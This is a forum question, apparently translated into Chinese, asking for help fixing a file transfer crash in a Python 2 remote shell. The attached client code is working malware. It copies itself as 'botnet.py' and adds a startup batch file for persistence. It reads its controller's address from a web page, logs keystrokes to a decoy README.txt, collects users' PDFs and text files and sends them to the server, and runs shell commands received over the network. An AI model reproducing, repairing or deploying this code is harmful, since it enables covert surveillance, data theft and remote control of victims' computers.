我目前正在创建一个基于 TCP 的反向 shell(客户端在远程计算机上,连接到本地服务器),它既可以发送和接收文件,也可以通过 TCP 发送 shell 命令。在我尝试从服务器向客户端发送大文件(我记得大于 1 kb)之前,这些程序在其他所有方面(例如,接收和发送命令,服务器接收文件)大部分时间都可以正常工作。当我尝试发送大文件时会发生什么,在服务器完成发送后,客户端由于某种原因崩溃。我什至看不到错误消息。我试图通过在客户端显示接收到的内容来调试它,但它似乎接收良好但立即崩溃。我将为那些想要帮助的人附上客户端代码和服务器代码。代码有点奇怪,因为我添加了一些“标志” 在我第一次调试期间。谢谢你。
服务器代码:
import socket, pickle, time, os
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = 'localhost'
port = 1024
server.bind((address, port))
server.listen(5)
c, addr = server.accept()
file_list = {}
print'connection from: '+str(addr)
print'remote shell can only be used for utility purpose, when switching dirve, use "//" between cd and address'
os.chdir("C:/Users/Insert_Name/Desktop/Server")
while True:
command = raw_input(str(addr)+'>>')
if command == 't':
c.send(command)
cile_list = c.recv(1024)
cile_lista = pickle.loads(cile_list)
for key, value in cile_lista.iteritems():
if 'Downloads' in key:
a, sep, b = key.partition('/Downloads/')
if 'Documents' in key:
a, sep, b = key.partition('/Documents/')
if 'JAVA' in key:
a, sep, b = key.partition('/JAVA_BACKUP/')
output = open(b, 'wb')
content = c.recv(value)
output.write(content)
output.close()
print'file transfer complete'
if command == 'a':
c.send(command)
print'enter T to indicate file list complete'
patha = raw_input('Enter file path(must be in server directory, aka Server): ')
while patha != 'T':
try:
f = open(patha,'rb')
f.close()
size = os.path.getsize(patha)
a, sep, b = str(size).partition('L')
file_list[patha] = int(a)
except:
print'invalid file name'
patha = raw_input('Enter file path(must be in server directory): ')
if len(file_list) == 0:
c.send(pickle.dumps({'0.txt':0}))
else:
file_lista = pickle.dumps(file_list)
c.send(file_lista)
print file_list
for file in file_list:
os.chdir("C:/Users/Insert_Name/Desktop/Server")
content = open(file, 'rb')
content = content.read()
c.send(content)
file_list.clear()
if command != 't':
if command != 'a':
if 'start' in command:
c.send(command)
else:
c.send(command)
if '//' in command:
a, sep, b = command.partition('//')
c.send(b)
feedback = c.recv(1024)
print feedback
while True:
feedback = c.recv(1024)
if '_DONE_' in feedback:
a, sep, b = feedback.partition('_SEP_')
print a
break
print feedback
客户代码:
import socket, os, textract, pickle, requests, time, threading, subprocess, getpass, shutil, lxml, glob, pyHook, pythoncom, sys, logging
from shutil import copyfile
from lxml import html
from os import listdir
#var is the varification webiste
var = 'https://www.publishthis.email/test-SJC9dAQ3G'
file_list = {}
print file_list
username = getpass.getuser()
def duplication(username):
source = "C:/Users/"+username+"/Downloads/MATH_COUNTS/botnet.py"
destination = "C:/Users/"+username+"/Saved Games"
shutil.copy(source, destination)
setup = open('C:/Users/'+ username+'/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/setup.bat', 'w')
pl =('@echo off\nstart C:\Users/%USERNAME%/Saved Games/botnet.py')
setup.write(pl)
setup.close()
def communication(var):
page = requests.get(var)
print page
tree = html.fromstring(page.content)
address = tree.xpath('//div[@class = "body"]/div[@dir = "ltr"]/text()')
address = ''.join(address)
address = address.replace("'", "")
return address
def keylogger(username):
filename = "C:/Users/"+username+"/Saved Games/README.txt"
def keylog(event):
username = getpass.getuser()
logging.basicConfig(filename ="C:/Users/"+username+"/Saved Games/README.txt" , level=logging.DEBUG, format = '%(message)s')
chr(event.Ascii)
logging.log(10, chr(event.Ascii))
return True
hm = pyHook.HookManager()
hm.KeyDown = keylog
hm.HookKeyboard()
pythoncom.PumpMessages()
def tcp_connection(address, username):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = client.connect((address, 1024))
while True:
command = client.recv(1024)
if command != 'a':
if command == 't':
file_gatherer(username)
print file_list
file_lista = pickle.dumps(file_list)
client.send(file_lista)
for file in file_list:
file = open(file, 'rb')
file = file.read()
client.send(file)
if command != 't':
if command != 'a':
if 'cd' in command:
f = os.getcwd()
b = client.recv(1024)
try:
os.chdir(b)
r = os.getcwd()
except:
r = 'error: invalid directory name'
else:
result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
f = result.stdout.read()
r = result.stderr.read()
client.send(f)
client.send(r)
client.send('_SEP_/n_DONE_')
if command == 'a':
cile_list = client.recv(1024)
cile_lista = pickle.loads(cile_list)
print cile_lista
for key, value in cile_lista.iteritems():
output = open(key, 'wb')
content = client.recv(value)
print content
output.write(content)
output.close()
def file_gatherer(username):
try:
os.makedirs("C:/Users/"+username+"/Games/JAVA_BACKUP")
except:
pass
for file in os.listdir("C:/Users/"+username+"/Games/JAVA_BACKUP"):
try:
file_list["C:/Users/"+username+"/Games/JAVA_BACKUP/" + file] = os.path.getsize(file)
except:
pass
os.chdir("C:/Users/"+username+"/Downloads")
for file in glob.glob('*.pdf'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Downloads/" + file] = int(a)
for file in glob.glob('*.txt'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Downloads/" + file] = int(a)
os.chdir("C:/Users/"+username+"/Documents")
for file in glob.glob('*.pdf'):
size = os.path.getsize(file)
a, sep, b = str(size).partition('L')
file_list["C:/Users/"+username+"/Documents/" + file] = int(a)
#for file in glob.glob('*.txt'):
# file_list["C:/Users/"+username+"/Documents/" + file] = os.path.getsize(file)
tcp_connection('localhost', username)
def main():
duplication()
keylogger()
address = communication(var)
file_gatherer()
file_transfer(address)
问题只是文件传输。